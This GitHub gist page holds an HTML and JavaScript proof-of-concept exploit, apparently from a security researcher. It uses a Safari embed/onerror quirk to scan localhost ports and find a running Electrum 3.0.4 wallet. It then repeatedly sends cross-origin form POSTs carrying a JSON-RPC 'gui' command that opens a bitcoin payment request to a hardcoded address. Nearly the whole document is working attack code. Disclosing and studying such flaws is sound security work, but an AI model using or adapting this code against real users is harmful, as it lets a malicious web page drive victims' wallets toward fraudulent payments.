Skip to content

Instantly share code, notes, and snippets.

@fransr

fransr/electrum.html

Last active November 30, 2021 11:03
Show Gist options
  • Star 7 You must be signed in to star a gist
  • Fork 8 You must be signed in to fork a gist
  • Save fransr/690e9ae6ce918d2e913ce6cb55ffbcae to your computer and use it in GitHub Desktop.
Save fransr/690e9ae6ce918d2e913ce6cb55ffbcae to your computer and use it in GitHub Desktop.
Download ZIP
Simple port-scan using embed+onerror in Safari to send gui-commands to Electrum 3.0.4 without the need of any CORS-headers
Raw
electrum.html
<body>
<style>pre { white-space: inherit }</style>
<pre id="log"></pre>
<div id="ports" style="visibility: hidden; height: 0; width: 0;"></div>
<iframe src="about:blank" name="x" id="x" style="display: none;"></iframe>
</body>
<script>
var electrum = {
logbreak: function() { e = document.createElement('br'); document.getElementById('log').appendChild(e); },
log: function(s) { e = document.createElement('span'); e.innerText = s+" "; document.getElementById('log').appendChild(e); },
ports: document.getElementById('ports'),
found_port: false,
port: 0
}
electrum.stage1 = function() {
electrum.log('Checking "open" ports using Safari bug...')
electrum.stage1.start(20000);
}
electrum.stage1.start = function(s) {
electrum.log(s);
electrum.stage1.images = []
electrum.stage1.remove = function(e,x) {
electrum.ports.removeChild(this)
delete this
}
if(electrum.found_port) return;
for(var i = s; i <= s+1000; i++) {
var port = i;
var x = document.createElement('embed');
x.src = 'http://127.0.0.1:'+port+'/x';
x.onload = electrum.stage1.done;
x.onerror = electrum.stage1.remove;
x.dataset.port = port
x.dataset.i = i
electrum.ports.appendChild(x)
setTimeout(function(x) { electrum.ports.removeChild(x) },1000,x)
electrum.stage1.images[i] = x
}
setTimeout(function(){electrum.stage1.start(s+1000);},2000);
}
electrum.stage1.done = function(e) {
electrum.ports.removeChild(e.target)
electrum.found_port = true;
electrum.port = e.target.dataset.port;
electrum.logbreak()
electrum.log('Open port found: ' + e.target.dataset.port)
electrum.stage2()
}
electrum.stage2 = function() {
electrum.log('Will set receiver address in 5 secs');
setTimeout(function() {
electrum.stage2.start();
})
}
electrum.stage2.start = function() {
f = document.createElement('form');
f.method = 'POST';
f.target = 'x';
f.enctype = 'text/plain';
f.action = 'http://127.0.0.1:' + electrum.port + '/';
i = document.createElement('input');
i.type = 'hidden';
i.name = '{"id":0,"method":"gui","params":[{"url":"bitcoin:1Jsjd6xL9NPzzUY5FxM7y614FFVKeg3QbM?';
i.value = '"}]}';
f.appendChild(i)
setInterval(function() { f.submit(); }, 5000);
}
//electrum.port = '59768';
electrum.stage1()
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment